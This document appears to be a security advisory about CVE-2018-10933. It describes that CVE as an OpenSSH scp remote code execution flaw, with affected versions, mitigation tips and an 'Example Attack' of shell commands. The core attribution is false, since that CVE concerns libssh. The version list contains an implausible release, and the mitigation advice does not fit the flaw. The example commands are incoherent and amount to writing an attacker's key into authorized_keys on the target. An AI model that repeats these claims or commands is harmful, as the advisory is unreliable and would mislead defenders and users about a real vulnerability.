CVE-2018-10933: OpenSSH Remote Code Execution Vulnerability

Description

CVE-2018-10933 is a security vulnerability affecting OpenSSH, which allows remote code execution on the client or server with a maliciously crafted scp request. This vulnerability exists due to scp accepting files from untrusted sources without verifying their contents and could allow an attacker to execute arbitrary code on the targeted system.

Impact

An attacker could exploit this vulnerability to execute arbitrary code on the targeted system or to gain unauthorized access to sensitive information.

Vulnerable Versions

This vulnerability exists in OpenSSH versions:

• OpenSSH version 7.7p1
• OpenSSH version 7.8p1
• OpenSSH version 7.9p1
• OpenSSH version 7.9p2
• OpenSSH version 7.9p3
• OpenSSH version 8.0

Mitigation

The OpenSSH team has released patches to address this vulnerability. It is recommended to update to the latest version of OpenSSH, such as OpenSSH 8.1p1, which has been patched to address CVE-2018-10933. Alternatively, users can mitigate the vulnerability by disabling the use of scp or by implementing rate limiting or IP-based access controls.

Example Attack

# On attacker machine
echo "ssh-rsa AAAAB3Nz...5XZ root@target" > malicious_key
ssh-keygen -f malicious_key -y > malicious_key.pub
python -c 'import os; os.system("echo -e \\"\\n\\" | ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i malicious_key target cat")'

# On target machine
mkdir ~/.ssh && chmod 700 ~/.ssh
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC22Ne75z6EWzujrZdRU0N2ZDnTDoe45qimzCJdgDmThZ7PQzLWB8HrOlFb48Lrw/AfMGaiHWjYCfRB5ri9WA2Xwe2lq3A62ljmMQsnXOrySwoNj0fMvYSD1PX1XV5m7Lc2v8Jx+13pbWymwg2WgE3bMDWvkY5zadAF2+bE0XBUVDzM3VGxjlOUvo8qK8adP5JrO/zGePXVfVHn9XvruoEDsbKB+AbjoJRs06JmzEhlh3COceR7rK1x9AEvOGmgHJeBxRvnQIdHMqBvLNqSmQXJjFziTNx02UN2SSVKQA+vHdQYfrtqc3mg34ezZzj08S38EONCQc/IYFDGbp' > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

References

• CVE-2018-10933
• OpenSSH Security Advisory